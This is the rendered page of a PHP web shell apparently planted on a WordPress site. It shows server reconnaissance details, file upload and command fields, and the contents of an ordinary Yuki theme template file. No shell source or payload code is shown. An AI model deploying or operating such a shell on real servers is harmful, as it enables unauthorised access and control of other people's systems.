403Webshell
Server IP :  /  Your IP : 216.73.216.44
Web Server : nginx/1.31.3
System : Linux dcde39c899c5 6.12.95+deb13-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.95-1 (2026-07-04) x86_64
User : www-data ( 1000)
PHP Version : 8.4.15
Disable Function : phpinfo
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/wp-content/themes/yuki/template-parts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/wp-content/themes/yuki/template-parts/special-page.php
<?php
/**
 * The template part for pages.
 *
 * @package Yuki
 */

use LottaFramework\Facades\CZ;
use LottaFramework\Utils;

$layout = 'no-sidebar';

if ( ( ! is_front_page() || is_home() ) && CZ::checked( 'yuki_page_sidebar_section' ) ) {
	$layout = CZ::get( 'yuki_page_sidebar_layout' );
}

?>

<?php
/**
 * Hook - yuki_action_before_page_container.
 */
do_action( 'yuki_action_before_page_container' );
?>

<div class="<?php Utils::the_clsx( yuki_container_css( $layout ) ) ?>">
    <div id="content" class="flex-grow max-w-full">
		<?php
		// posts loop
		while ( have_posts() ) {
			the_post();

			/**
			 * Hook - yuki_action_before_page.
			 */
			do_action( 'yuki_action_before_page' );

			/**
			 * Hook - yuki_action_page.
			 */
			do_action( 'yuki_action_page' );

			/**
			 * Hook - yuki_action_after_page.
			 */
			do_action( 'yuki_action_after_page' );
		}
		?>
    </div>

	<?php
	/**
	 * Hook - yuki_action_sidebar.
	 */
	do_action( 'yuki_action_sidebar', $layout );
	?>
</div>


Youez - 2016 - github.com/yon3zu
LinuXploit